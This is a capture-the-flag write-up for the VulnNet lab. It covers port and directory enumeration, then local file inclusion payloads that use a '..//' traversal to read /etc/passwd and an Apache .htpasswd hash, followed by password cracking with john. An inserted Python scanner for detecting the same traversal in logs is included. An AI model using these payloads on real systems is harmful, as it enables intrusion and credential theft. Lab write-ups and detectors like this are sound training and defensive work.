VulnNet

Can you take advantage of the misconfigurations made by VulnNet Entertainment?

Enumeration

1) masscan: masscan -e eth0 -p 1-65535 --rate=10000 10.10.186.105

Discovered open port 22/tcp on 10.10.186.105
Discovered open port 80/tcp on 10.10.186.105

2) nmap: nmap -sV -sC -p 22,80 -v 10.10.186.105

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c (RSA)
|   256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 (ECDSA)
|_  256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 8B7969B10EDA5D739468F4D3F2296496
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: VulnNet

3) gobuster:

gobuster dir -u http://vulnnet.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Starting gobuster
===============================================================
/img (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)

4) Found a login page:

5) nikto scan: nikto -h http://vulnnet.thm

+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ Server leaks inodes via ETags, header found with file /LICENSE.txt, fields: 0x455 0x5b995f090f3a1
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.

6) LICENSE.txt reveals the zlib version, but that version is not vulnerable.

7) The /js directory lists the site's .js files.

8) Running linkfinder against those .js files turns up two endpoints:

http://vulnnet.thm/index.php?referer=
http://broadcast.vulnnet.thm

9) After adding broadcast.vulnnet.thm to /etc/hosts, the host shows:

10) The referer parameter is vulnerable to LFI (local file inclusion); note the ..// form of the traversal sequence: curl http://vulnnet.thm/index.php?referer=..//..//..//..//..//..//etc/passwd

11) Searching for credentials in common files:

curl http://vulnnet.thm/index.php?referer=..//..//..//..//..//..//etc/apache2/.htpasswd

developers:$apr1$ntOz2ERF$..................
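As an added defensive example, not part of the original writeup: a Python scanner that flags the ..// traversal from steps 10 and 11 in Apache access-log lines. The log lines and client IP are constructed; collapsing repeated slashes after (repeated) URL decoding is what makes the ..// form, which slips past a naive "../" filter, visible.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-log lines (hypothetical client IP), not taken from the writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2021:12:00:01 +0000] "GET /index.php?referer=index.html HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.0.0.5 - - [10/Jan/2021:12:00:02 +0000] "GET /index.php?referer=..//..//..//..//..//..//etc/passwd HTTP/1.1" 200 2048 "-" "curl/7.68.0"
10.0.0.5 - - [10/Jan/2021:12:00:03 +0000] "GET /index.php?referer=%252e%252e%252fetc/apache2/.htpasswd HTTP/1.1" 200 64 "-" "curl/7.68.0"
10.0.0.5 - - [10/Jan/2021:12:00:04 +0000] "GET /css/style.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Enough of the combined-log format to pull out client, request target and status.
REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def normalize(value: str) -> str:
    """Decode until stable (catches double encoding) and collapse slash runs so '..//' reads as '../'."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return re.sub(r'/+', '/', value.replace('\\', '/'))

def traversal_params(target: str) -> list[str]:
    """Return the names of query parameters whose value walks above the web root or is absolute."""
    hits = []
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for raw in values:
            clean = normalize(raw)
            if '../' in clean or clean.startswith('/'):
                hits.append(name)
    return hits

def scan_log(text: str) -> list[dict]:
    """Flag every request whose query string carries a traversal sequence."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        params = traversal_params(m['target'])
        if params:
            findings.append({'ip': m['ip'], 'params': params,
                             'status': int(m['status']), 'target': m['target']})
    return findings

if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request, as in the constructed lines, is the signal worth alerting on; a 404 or 403 on the same pattern is reconnaissance that did not succeed.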

Exploitation:

12) Cracking the hash: john hash --wordlist=/usr/share/wordlists/rockyou.txt

13) With these credentials I can log in to broadcast.vulnnet.thm.

14) The site is running ClipBucket 4.0, for which a public exploit exists: Exploit DB
